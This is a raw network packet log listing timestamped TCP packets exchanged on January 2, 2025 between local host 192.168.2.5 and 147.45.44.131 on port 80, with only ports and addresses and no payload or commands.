Jan 2, 2025 19:14:14.856213093 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.856219053 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.856225014 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.856235027 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.856240034 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.856326103 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.856331110 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.856343985 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.856362104 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.856519938 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.856751919 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.856764078 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.856781006 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.856791019 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.856801987 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.856815100 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.856825113 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.856825113 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.856825113 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.856838942 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.856852055 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.856853962 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.856873989 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.856888056 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.856889963 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.856899977 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.856914043 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.856947899 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.856969118 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.856981039 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.856992960 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.857002974 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.857014894 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.857026100 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.857055902 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.857055902 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.857196093 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.857207060 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.857213020 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.857220888 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.857225895 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.857232094 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.857237101 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.857243061 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.857253075 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.857259035 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.857264996 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.857346058 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.857346058 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.857481003 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.857492924 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.857503891 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.857513905 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.857525110 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.857536077 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.857562065 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.857562065 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.857755899 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.939656973 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.939717054 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.939730883 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.939743042 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.939754963 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.939766884 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.939776897 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.939791918 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.939791918 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.939831018 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.940840960 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.940854073 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.940865040 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.940876961 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.940887928 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.940900087 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.940911055 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.940917969 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.940942049 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.941055059 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.941116095 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.941257954 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.941268921 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.941287041 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.941298962 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.941309929 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.941320896 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.941327095 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.941332102 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.941332102 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.941345930 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.941353083 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.941356897 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.941379070 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.941384077 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.941390991 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.941402912 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.941411018 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.941436052 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.941725969 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.942277908 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.942399979 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.942410946 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.942428112 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.942439079 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.942450047 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.942461014 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.942471027 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.942481995 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.942485094 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.942485094 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.942495108 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.942506075 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.942509890 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.942523003 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.942533970 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.942543983 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.942543983 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.942545891 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.942579031 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.942605019 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.942650080 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.942774057 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.942791939 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.942799091 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.942804098 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.942809105 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.942819118 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.942828894 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.942840099 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.942850113 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.942861080 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.942871094 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.942881107 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.942892075 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.942903042 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.942972898 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.942972898 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.943181992 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.943195105 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.943205118 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.943214893 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.943226099 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.943236113 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.943252087 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.943253040 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.943253994 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.943263054 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.943275928 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.943286896 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.943286896 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.943295002 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.943308115 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.943324089 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.943336964 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.943336964 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.943348885 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.943361044 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.943365097 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.943372965 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.943384886 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.943394899 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.943397045 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.943411112 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.943423033 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.943439960 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.943514109 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.943794966 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.943870068 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.943880081 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.943892002 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.943978071 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.943978071 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.944032907 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.944044113 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.944053888 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.944067955 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.944084883 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.944097996 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.944109917 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.944111109 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.944127083 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.944130898 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.944149017 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.944159985 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.944164991 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.944165945 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.944173098 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.944185019 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.944195986 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.944207907 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.944210052 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.944210052 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.944220066 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.944232941 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.944236994 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.944245100 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.944256067 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.944277048 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.944289923 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.944295883 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.944295883 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.944300890 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.944314003 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.944324017 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.944334984 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.944345951 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.944356918 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.944367886 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.944370031 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.944370031 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.944380999 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.944391012 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:14.944421053 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.944421053 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:14.944634914 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.026212931 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.026256084 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.026268005 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.026285887 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.026298046 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.026309013 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.026321888 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.026340008 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.026349068 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.026410103 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.026410103 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.027347088 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.027358055 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.027369976 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.027431011 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.027441978 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.027453899 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.027465105 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.027477026 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.027477980 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.027477026 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.027532101 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.027556896 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.027570009 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.027656078 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.027667046 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.027678013 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.027688980 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.027723074 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.027776957 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.027790070 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.027791977 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.027806044 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.027817011 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.027827024 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.027853966 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.027873993 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.027873993 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.027882099 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.027894020 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.027904034 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.027915955 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.027921915 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.027947903 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.027995110 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.028795958 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.028809071 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.028820038 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.028867006 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.028877974 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.028898954 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.028898954 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.028898954 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.028917074 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.028928041 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.028939009 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.028934956 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.028950930 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.028980017 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.029014111 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.029031992 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.029048920 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.029059887 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.029059887 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.029073000 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.029079914 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.029109001 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.029171944 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.029181957 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.029213905 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.029244900 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.029258966 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.029277086 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.029285908 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.029294014 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.029305935 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.029318094 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.029340982 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.029340982 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.029405117 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.029408932 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.029433012 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.029443979 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.029454947 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.029465914 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.029494047 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.029494047 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.029505968 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.029517889 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.029532909 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.029542923 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.029544115 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.029556036 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.029598951 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.029598951 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.029628992 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.029640913 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.029655933 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.029666901 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.029680014 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.029681921 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.029700994 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.029700994 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.029706001 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.029747009 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.029778957 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.029793024 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.029807091 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.029819965 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.029830933 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.029860973 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.029881001 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.029881001 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.029916048 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.029930115 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.029964924 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.029975891 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.029987097 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.029997110 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.030008078 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.030036926 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.030036926 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.030036926 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.030314922 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.030375004 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.030375957 CET	49721	80	192.168.2.5	147.45.44.131
